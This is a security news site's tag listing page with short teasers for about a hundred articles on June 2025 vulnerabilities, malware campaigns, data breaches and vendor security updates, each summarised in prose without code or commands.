Tag: GBHackers Security | #1 Globally Trusted Cyber Security News Platform

Network administrators and cybersecurity experts will be pleased to learn that OpenVPN 2.7_alpha2 will be released on June 19, 2025, according to the OpenVPN community project team. While this early alpha build for the upcoming 2.7.0 feature release introduces several…

Read more →

A covert Iranian social media operation has been uncovered, targeting Israeli users on platform X with a psychological campaign designed to sow discord and despair. Researchers at the Foundation for Defense of Democracies (FDD) have exposed a Persian-language Telegram channel,…

Read more →

Mattermost, a widely-used open-source collaboration platform, has recently disclosed critical vulnerabilities in its software that could allow attackers to execute remote code through path traversal exploits. As detailed on the official Mattermost Security Updates page, these flaws have been identified…

Read more →

Aflac Incorporated, a Georgia-based insurance giant, identified unauthorized access to its network infrastructure, raising alarms over a potential data breach. The company swiftly activated its cybersecurity incident response protocols and claims to have contained the intrusion within hours of detection.…

Read more →

Cyberspace has become a crucial battlefield in addition to conventional combat since the open conflict between Israel and Iran broke out. Following Israeli airstrikes on Iranian nuclear and military sites and Iran’s retaliatory missile salvos, both nations recognized as formidable…

Read more →

DuckDuckGo has rolled out an advanced update to its browser’s built-in Scam Blocker, a robust security feature designed to shield users from a wide array of online threats, including phishing sites, malware, and sophisticated scams. Now integrated into the DuckDuckGo…

Read more →

A series of misconfigured web servers have been uncovered, revealing a treasure trove of publicly accessible tools and tactics employed by malicious actors targeting critical infrastructure. These exposed open directories, discovered through Hunt’s advanced scanning capabilities, highlight a significant security…

Read more →

A recent report from ESET has uncovered a sophisticated cyber espionage campaign by the Russia-aligned Sednit group, targeting high-value webmail platforms through cross-site scripting (XSS) attacks. Dubbed Operation RoundPress, this operation has compromised popular webmail services such as Roundcube, Horde,…

Read more →

Microsoft has unveiled a groundbreaking advancement in cybersecurity with the integration of the Enterprise Exposure Graph into its threat detection and response capabilities. This cutting-edge solution, part of Microsoft Defender XDR and Microsoft Security Exposure Management (MSEM), is designed to…

Read more →

Over 35 different pro-Iranian hacktivist organizations launched a coordinated attack on Israeli military, government, and key infrastructure targets in a dramatic escalation of cyberwarfare. This surge in activity starkly contrasts with the limited response from just 4-5 identified pro-Israeli groups,…

Read more →

China’s National Cybersecurity Notification Center has issued an urgent warning about critical vulnerabilities in ComfyUI, a widely used image-generation framework for large AI models. These flaws, already under active exploitation by hacker groups, have compromised at least 695 servers worldwide,…

Read more →

In a Russia’s dairy supply chain, a suspected cyberattack has targeted the Mercury component of the national veterinary certification system, forcing it into emergency operation mode. This critical system, integral to the processing of veterinary accompanying documents, ensures the traceability…

Read more →

Unit 42 researchers from Palo Alto Networks have identified a renewed wave of attacks by the Prometei botnet, specifically targeting Linux servers, as of March 2025. Initially discovered in July 2020 with a focus on Windows systems, Prometei has since…

Read more →

A newly identified cyber threat linked to a China-based threat actor has emerged, targeting users across East and Southeast Asia with a trojanized MSI installer disguised as a legitimate WhatsApp setup file. This deceptive campaign delivers a customized version of…

Read more →

A malicious campaign tracked as Mocha Manakin has been identified employing the deceptive “paste-and-run” technique to trick unsuspecting users into executing harmful scripts. First observed in August 2024 and actively monitored since January 2025 by security researchers at Red Canary,…

Read more →

Threat actors are increasingly exploiting the trust users place in sponsored search results on platforms like Google to orchestrate sophisticated scams. These malicious entities craft deceptive advertisements that mimic legitimate websites, particularly targeting popular brands and tech support services. By…

Read more →

A severe security vulnerability in the Insomnia API Client, a widely used tool by developers and security testers for interacting with APIs, has been uncovered by researchers at an offensive security consultancy. Discovered by Technical Director Marcio Almeida and Head…

Read more →

CyberArmor has uncovered a sophisticated phishing campaign exploiting Vercel, a widely used frontend hosting platform, to distribute a malicious variant of LogMeIn, a legitimate remote access tool. Over the past two months, threat actors have orchestrated at least 28 distinct…

Read more →

A new and alarming phishing campaign has surfaced, leveraging the credibility of a .gov domain to deceive employees into believing they owe unpaid tolls. Identified by the Cofense Phishing Defense Center (PDC), this campaign manipulates the GovDelivery system a legitimate…

Read more →

A recent threat hunting session has revealed a sophisticated PowerShell script, named y1.ps1, hosted in an open directory on a Chinese server (IP: 123.207.215.76). First detected on June 1, 2025, this script operates as a shellcode loader, employing advanced in-memory…

Read more →

The internet witnessed a new record in cyberattacks last month as Cloudflare, blocked the largest distributed denial-of-service (DDoS) attack ever recorded. The attack peaked at an astonishing 7.3 terabits per second (Tbps), overwhelming its target with 37.4 terabytes of data…

Read more →

A recent security analysis has revealed how a chain of misconfigurations in Microsoft Azure can allow attackers to gain complete control over an organization’s cloud infrastructure, from initial access to full tenant takeover. The attack path, demonstrated using real-world tools…

Read more →

A new Android botnet malware named AntiDot has emerged as a formidable threat, granting cybercriminals unprecedented control over infected devices. Operated and sold by LARVA-398 as a Malware-as-a-Service (MaaS) on underground forums like XSS, AntiDot is marketed as a “3-in-1”…

Read more →

Oxford City Council has confirmed it was the target of a sophisticated cyberattack that resulted in the exposure of personal data belonging to employees, including those involved in council-administered elections over the past two decades. The council detected an unauthorised…

Read more →

Zimperium zLabs has uncovered a highly advanced iteration of the GodFather Android banking malware, which employs a groundbreaking on-device virtualization technique to compromise legitimate mobile banking and cryptocurrency applications. Unlike traditional overlay attacks that merely mimic login screens, this malware…

Read more →

A newly disclosed set of vulnerabilities in Versa Networks’ SD-WAN orchestration platform, Versa Director, with the flaws enabling authenticated attackers to upload malicious files and execute arbitrary commands on affected systems. The vulnerabilities, tracked as CVE-2025-23171 and CVE-2025-23172, stem from…

Read more →

Microsoft has announced a significant update to the security posture of its Windows 365 Cloud PCs, introducing new secure-by-default capabilities designed to fortify virtual desktop environments against modern cyber threats. These changes, set to roll out in the second half…

Read more →

A newly disclosed critical vulnerability in Dover Fueling Solutions’ ProGauge MagLink LX consoles has sent shockwaves through the global fuel infrastructure sector. The flaw, tracked as CVE-2025-5310, allows remote attackers to seize control of fueling operations, manipulate tank monitoring, and…

Read more →

A newly disclosed vulnerability in Apache SeaTunnel, a popular distributed data integration platform, has raised alarms in the cybersecurity community. The flaw, tracked as CVE-2025-32896, allows unauthorized users to exploit insecure REST API endpoints, enabling arbitrary file read and potentially…

Read more →

IBM has issued a critical security update for its QRadar SIEM platform after researchers uncovered multiple vulnerabilities, including a severe flaw that allows privileged users to execute arbitrary commands on affected systems. The vulnerabilities, disclosed in a security bulletin published…

Read more →

A staggering 16 billion login credentials, usernames, and passwords have been exposed in what cybersecurity experts are calling the largest data breach in internet history. The leak, which impacts major platforms including Apple, Facebook, Google, Instagram, Telegram, GitHub, and even…

Read more →

Security researchers from Synacktiv successfully hacked the Tesla Wall Connector through its charging port in just 18 minutes, exposing critical vulnerabilities in the device’s firmware and communication protocols. The Tesla Wall Connector and Its Architecture The Tesla Wall Connector is…

Read more →

A new class of cyberattack is targeting organizations leveraging Atlassian’s Model Context Protocol (MCP), exposing a critical weakness in the boundary between external and internal users. Researchers have demonstrated that malicious support tickets can be weaponized to exploit AI-powered workflows…

Read more →

The North Korean state-sponsored threat actor group, identified as TA444 (also known as BlueNoroff, Sapphire Sleet, and others), has unleashed a sophisticated malware campaign targeting cryptocurrency foundations. This intricate attack, uncovered by Huntress, leverages weaponized Calendly links and deceptive Google…

Read more →

The Wordfence Threat Intelligence team identified a severe security flaw in the AI Engine plugin, a widely used tool installed on over 100,000 WordPress websites. This vulnerability, classified as an Insufficient Authorization to Privilege Escalation via Model Context Protocol (MCP),…

Read more →

The China-based advanced persistent threat (APT) group Silver Fox, also known as Void Arachne or The Great Thief of Valley, has been identified as the orchestrator of a complex multi-stage campaign targeting healthcare delivery organizations (HDOs) and public sector entities.…

Read more →

Minecraft, the wildly popular sandbox game with over 200 million monthly active players, has become the latest hunting ground for cybercriminals. Check Point Research recently uncovered a sinister campaign targeting Minecraft users through the Stargazers Ghost Network, a Distribution as…

Read more →

Security researchers from the Trellix Advanced Research Centre have uncovered a sophisticated malware campaign exploiting the widely trusted jQuery Migrate library, a backward compatibility plugin used extensively in platforms like WordPress, Joomla, and Drupal. The attack, which began with a…

Read more →

Proofpoint has uncovered a rebranded and significantly enhanced information stealer named Amatera Stealer, derived from the previously known ACR Stealer. Identified in early 2025, this malware exhibits substantial code overlap with its predecessor but introduces advanced features and stealth mechanisms…

Read more →

Our team stumbled upon a disturbing array of SpyNote spyware samples lurking in open directories across the internet. These misconfigured digital repositories, often overlooked as mere storage spaces, have become unwitting hosts to dangerous malware targeting Android users. Uncovering Hidden…

Read more →

Krispy Kreme Doughnut Corporation has confirmed a significant data breach that exposed the personal information of over 160,000 individuals following a ransomware attack in late 2024. The incident, which affected both employees and customers, has raised concerns about data security…

Read more →

Seqrite Labs has uncovered a sophisticated variant of the Masslogger credential stealer malware being distributed through VBScript Encoded (.VBE) files. This advanced threat, which likely spreads via spam emails or drive-by downloads, operates as a multi-stage fileless malware, heavily exploiting…

Read more →

The global cybersecurity landscape is facing a seismic shift as the Qilin ransomware group, also known as Agenda, has surged to the forefront of digital extortion, demanding ransoms as high as $50 million and disrupting critical services worldwide. Once an…

Read more →

The Golden SAML assault is a lesser-known but much more dangerous threat in a world where password-based hacks breach millions of accounts every month. Unlike common password sprays or phishing attempts, Golden SAML attacks are rare, with Microsoft reporting only…

Read more →

Viasat Inc., a leading U.S. satellite and wireless communications provider, has been identified as the latest victim in a sweeping cyberespionage campaign attributed to the Chinese state-sponsored group known as Salt Typhoon. The breach, which occurred during the 2024 U.S.…

Read more →

A threat actor group known as Banana Squad has been found exploiting GitHub, a cornerstone platform for developers worldwide, by hosting over 60 malicious repositories containing hundreds of trojanized Python files. Discovered by the ReversingLabs threat research team, this campaign…

Read more →

Google Threat Intelligence Group (GTIG), in collaboration with external partners, has uncovered a sophisticated phishing campaign orchestrated by a Russia state-sponsored cyber threat actor, tracked as UNC6293. Active from at least April through early June 2025, this campaign specifically targeted…

Read more →

The ClamAV development team has rolled out two crucial security patch releases, versions 1.4.3 and 1.0.9, aimed at resolving significant vulnerabilities that could compromise system integrity. Alongside these patches, the team has introduced Linux aarch64 (ARM64) RPM and DEB installer…

Read more →

A sophisticated malware campaign dubbed SERPENTINE#CLOUD has emerged, leveraging Cloudflare Tunnel infrastructure to deliver Python-based malware to Windows systems across Western nations, including the United States, United Kingdom, and Germany. This ongoing operation, characterized by its use of obfuscated scripts…

Read more →

Microsoft has announced a significant update to its identity platform, Microsoft Entra ID, with the introduction of expanded passkey (FIDO2) support in public preview. Set to roll out globally from mid-October to mid-November 2025, this enhancement marks a major step…

Read more →

A groundbreaking detection technique called Jitter-Trap has been unveiled by Varonis Threat Labs, promising to revolutionize how organizations identify one of the most elusive stages in the cyberattack lifecycle: post-exploitation and command-and-control (C2) communication. This method leverages the very randomness that threat…

Read more →

A sophisticated cyberattack campaign has been uncovered, leveraging LogMeIn Resolve remote access software to gain unauthorized control over user systems. Security researchers report that the attack begins with a convincingly crafted invoice-themed spam email, designed to trick recipients into opening…

Read more →

A newly disclosed vulnerability in Cisco’s AnyConnect VPN implementation for Meraki MX and Z Series devices poses a significant risk to enterprise networks, enabling unauthenticated attackers to disrupt remote access by triggering denial-of-service (DoS) conditions. The flaw, tracked as CVE-2025-20271,…

Read more →

Thai authorities have dismantled a sophisticated criminal enterprise operating from the eight-storey Antai Holiday Hotel in Pattaya, unearthing both a high-stakes gambling den and a cybercrime ring specializing in ransomware attacks. The raid, conducted at 11:30 p.m. on June 16,…

Read more →

A newly disclosed vulnerability in Apache Traffic Server (ATS) has raised serious concerns among enterprise users and cloud providers, as attackers can exploit a flaw in the Edge Side Includes (ESI) plugin to trigger denial-of-service (DoS) attacks by exhausting server…

Read more →

A critical vulnerability known as Password Reset Link Poisoning has recently come under the spotlight, exposing web users and organizations to the risk of full account takeover. This flaw, which leverages Host Header Injection, enables attackers to manipulate the domain in password…

Read more →

A critical Server-Side Request Forgery (SSRF) vulnerability has been discovered in the @opennextjs/cloudflare package, posing a significant security threat to websites deployed using the Cloudflare adapter for Open Next. The flaw, now tracked as CVE-2025-6087, allows unauthenticated attackers to proxy…

Read more →

The People’s Liberation Army (PLA) of China has adopted generative artificial intelligence (AI) to revolutionize its intelligence capabilities, marking a major step in modernizing military operations. According to recent analyses, the PLA has shown a clear intent to integrate generative…

Read more →

A North Korean-affiliated threat actor called Famous Chollima (also known as Wagemole) has launched a sophisticated remote access trojan (RAT) campaign against Windows and MacOS devices, a concerning development discovered by Cisco Talos in May 2025. This group, suspected to…

Read more →

Russia’s sophisticated cyber warfare strategy emerges as a calculated blend of state power and non-state agility, leveraging private companies, hacktivists, and criminal proxies to amplify its digital dominance. The roots of this hybrid model trace back to the collapse of…

Read more →

The Sysdig TRT has uncovered critical vulnerabilities in the GitHub Actions workflows of several high-profile open source projects, including those maintained by MITRE and Splunk. GitHub Actions, a popular platform for automating CI/CD pipelines, offers immense flexibility for developers but…

Read more →

Microsoft has announced a significant enhancement to its Office 365 Defender suite with the introduction of Mail Bombing Detection, a new feature designed to combat the rising threat of email bombing attacks. This capability will be rolled out globally, starting…

Read more →

Mobile wallets like Apple Pay and Google Pay (GPay) have revolutionized the way we pay, offering speed and convenience that traditional cards can’t match. But as recent research and real-world incidents show, these digital wallets are not immune to attack.…

Read more →

A recent vulnerability has been discovered in the Zyxel NWA50AX Pro, a WiFi 6 access point for small businesses, exposing it to an n-day flaw that allows arbitrary file deletion via a misconfigured CGI endpoint. This issue, tracked as CVE-2024-29974,…

Read more →

F6, a leading developer of technologies to combat cybercrime, has reported the emergence of SuperCard, a malicious modification of the legitimate NFCGate program, now targeting Android users globally, with recent attacks recorded in Russia. Initially detected in Europe during spring…

Read more →

A highly coordinated phishing campaign surfaced, targeting U.S. citizens by impersonating various state Departments of Motor Vehicles (DMVs). This widespread attack utilized SMS phishing, or “smishing,” as its primary delivery vector, bombarding victims with alarming text messages about fictitious unpaid…

Read more →

The RapperBot botnet has resurfaced with unprecedented aggression, targeting network edge devices in a staggering series of over 50,000 attacks. Identified and detailed by researchers at Qianxin XLab, this botnet represents a sophisticated threat to Internet of Things (IoT) ecosystems,…

Read more →

The rapid evolution of large language models (LLMs) has not only transformed legitimate industries but has also found its way into the hands of cybercriminals. WormGPT, a notorious blackhat AI tool, has recently resurfaced in enhanced forms powered by advanced…

Read more →

Google has released a crucial security update for its Chrome browser, addressing multiple high-severity vulnerabilities that could allow attackers to execute arbitrary code on affected systems. The update, now rolling out as version 137.0.7151.119/.120 for Windows and Mac, and 137.0.7151.119…

Read more →

VMware has officially announced the general availability of VMware Cloud Foundation (VCF) 9.0, marking a significant leap in private cloud technology designed to meet the demands of AI, data-intensive workloads, and modern enterprise operations. For years, organizations faced a stark…

Read more →

Qilin ransomware has emerged as a formidable force, rapidly ascending to prominence amid the collapse of once-dominant groups like RansomHub and LockBit in 2025. Active since October 2022, Qilin has solidified its position through a sophisticated Ransomware-as-a-Service (RaaS) model, offering…

Read more →

Cybercriminals are increasingly exploiting a deceptive social engineering technique known as ClickFix to initiate multi-stage cyberattacks, delivering remote access trojans (RATs) and data-stealing malware with alarming efficiency. First identified in March 2024, ClickFix manipulates users into executing malicious PowerShell commands…

Read more →

FortiGuard Labs has uncovered a formidable new strain of malware, dubbed Winos 4.0, targeting Microsoft Windows users, with a particular focus on individuals in Taiwan. First detected in January 2025, this malicious campaign leverages cunning phishing tactics, masquerading as communications…

Read more →

The Qualys Threat Research Unit (TRU) has uncovered two interconnected local privilege escalation (LPE) vulnerabilities—CVE-2025-6018 and CVE-2025-6019—that together enable attackers to gain full root access on a wide range of Linux distributions with minimal effort.  These flaws impact both desktop…

Read more →

A significant data breach has rocked Sweden’s Scania Financial Services, as a threat actor operating under the alias “hensi” claims to have infiltrated the subdomain insurance.scania.com, exfiltrating a trove of sensitive files and offering them for sale on underground forums. …

Read more →

The Cybersecurity and Infrastructure Security Agency (CISA) issued an urgent alert regarding active exploitation of a critical Linux kernel vulnerability, tracked as CVE-2023-0386, which has now been added to the Known Exploited Vulnerabilities (KEV) Catalog. This flaw, rooted in the…

Read more →

A critical vulnerability, dubbed “GerriScary,” has been discovered in Google’s Gerrit code-collaboration platform, putting at least 18 major Google projects—including ChromiumOS, Chromium, Dart, and Bazel—at risk of unauthorized code submissions by hackers.  This flaw, uncovered by Tenable Cloud Research, highlights…

Read more →

Two critical vulnerabilities have been discovered in Citrix NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway), potentially exposing sensitive data to hackers and putting enterprise networks at significant risk.  The flaws, identified as CVE-2025-5349 and CVE-2025-5777, have…

Read more →

Veeam, a leading provider of data protection and backup solutions, disclosed three critical vulnerabilities affecting its widely deployed backup software. These flaws—assigned CVE-2025-23121, CVE-2025-24286, and CVE-2025-24287—could allow attackers to execute code remotely or escalate privileges, posing significant risks to organizations…

Read more →

An important development discovered in March 2025 by Orange Cyberdefense’s Managed Threat Detection teams in Belgium was that a European client was the subject of a malicious infection chain that used the Sorillus Remote Access Trojan (RAT). Further analysis by…

Read more →

The Acronis Threat Research Unit has identified new variants of Chaos RAT, a remote administration tool (RAT) that has evolved from an open-source project first observed in 2022 into a formidable multi-platform malware. These latest iterations of Chaos RAT are…

Read more →

The two new variants of the KimJongRAT stealer have emerged, showcasing the persistent and evolving nature of this malicious tool first identified in 2013. Detailed research by Palo Alto Networks’ Unit 42 reveals that these variants, one employing a Portable…

Read more →

A recently uncovered malware campaign has revealed a highly sophisticated, multi-stage infection process utilizing heavily obfuscated Visual Basic Script (VBS) files to deploy remote access trojans (RATs) such as Remcos, LimeRAT, DCRat, and AsyncRAT. Discovered across a cluster of 16…

Read more →

The AhnLab Security Intelligence Center (ASEC) recently made the concerning revelation that the infamous Kimsuky hacking organization was connected to a crafty phishing email campaign that targeted unwary people. Disguised as a seemingly legitimate request for a paper review from…

Read more →

The XDSpy threat actor has been identified as exploiting a Windows LNK zero-day vulnerability, dubbed ZDI-CAN-25373, to target governmental entities in Eastern Europe and Russia. This ongoing campaign, active since March 2025, employs an intricate multi-stage infection chain to deploy…

Read more →

An significant 20 Advanced Persistent Threat (APT) occurrences were found in April 2025, according to a new report from Fuying Lab’s worldwide threat hunting system. East Asia emerges as a primary hotspot, where the notorious APT groups Kimsuky and Konni…

Read more →

A series of newly disclosed critical vulnerabilities in the Sitecore Experience Platform (XP) have raised alarm across the enterprise technology sector, with security researchers warning that unpatched systems could be exposed to devastating remote code execution (RCE) attacks. Sitecore, a…

Read more →

A newly disclosed vulnerability in BeyondTrust’s Remote Support (RS) and Privileged Remote Access (PRA) products has raised alarms across the cybersecurity community. The flaw, tracked as CVE-2025-5309 and detailed in advisory BT25-04, allows attackers to execute arbitrary code on affected…

Read more →

A new wave of cybercrime is exploiting the very backbone of internet trust: search engines. Recent research by Netcraft has exposed a sophisticated and organized SEO poisoning operation, where hackers manipulate search engine algorithms to push malicious websites to the…

Read more →

Threat actors are leveraging deceptive tactics to distribute a fileless variant of AsyncRAT, a notorious remote access Trojan. Discovered during routine attacker infrastructure analysis, this operation employs a fake verification prompt themed around the “Clickfix” technique to trick users into…

Read more →

WhatsApp, the world’s most popular messaging app, is entering a new era as Meta officially begins rolling out advertisements within its Updates tab—a move that marks the platform’s most significant shift in monetization since its inception. The announcement, made on…

Read more →

A critical vulnerability in ASUS’s popular Armoury Crate software has exposed millions of Windows users to the risk of system-level compromise, according to a recent disclosure by Cisco Talos and confirmed by ASUS. The flaw, tracked as CVE-2025-3464, allows attackers…

Read more →

Security researchers disclosed two critical vulnerabilities in sslh, a widely used protocol multiplexer that enables multiple services—such as SSH, HTTPS, and OpenVPN—to share a single network port. These flaws, tracked as CVE-2025-46807 and CVE-2025-46806, could allow remote attackers to crash…

Read more →

A newly identified threat actor known as Water Curse has been linked to a sprawling campaign utilizing at least 76 GitHub accounts to distribute weaponized repositories packed with multistage malware. This financially motivated group leverages the inherent trust in open-source…

Read more →

A newly discovered zero-day vulnerability in Google Chrome, tracked as CVE-2025-2783, is being actively exploited by hackers in sophisticated cyber-espionage campaigns. Security researchers have observed a surge in targeted attacks leveraging this flaw, with attribution pointing to the advanced persistent…

Read more →

Over 150,000 users across Google Play and the Apple App Store have fallen victim to a malicious SpyLoan application named “RapiPlata,” which was identified in February 2025 by advanced detection engines. This app, posing as a legitimate financial service primarily…

Read more →

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a high-priority alert following the discovery and active exploitation of a critical zero-click vulnerability in Apple’s ecosystem, tracked as CVE-2025-43200. This flaw, now patched, enabled attackers to compromise iOS, iPadOS,…

Read more →

Threat actors are increasingly exploiting legitimate channels to achieve privilege escalation, posing a severe risk to millions of devices worldwide. While conventional exploits remain a concern, a more insidious danger emerges from applications gaining excessive system access through mechanisms such…

Read more →

The eSentire’s Threat Response Unit (TRU) has uncovered a series of malicious campaigns throughout May 2025, where threat actors have been deploying the DeerStealer malware, also known as XFiles Spyware, using the HijackLoader malware loader. This sophisticated information stealer, peddled…

Read more →

A former intern at the UK’s intelligence agency GCHQ has been sentenced to seven and a half years in prison after admitting to smuggling top secret data out of a secure facility using his mobile phone, in a breach described…

Read more →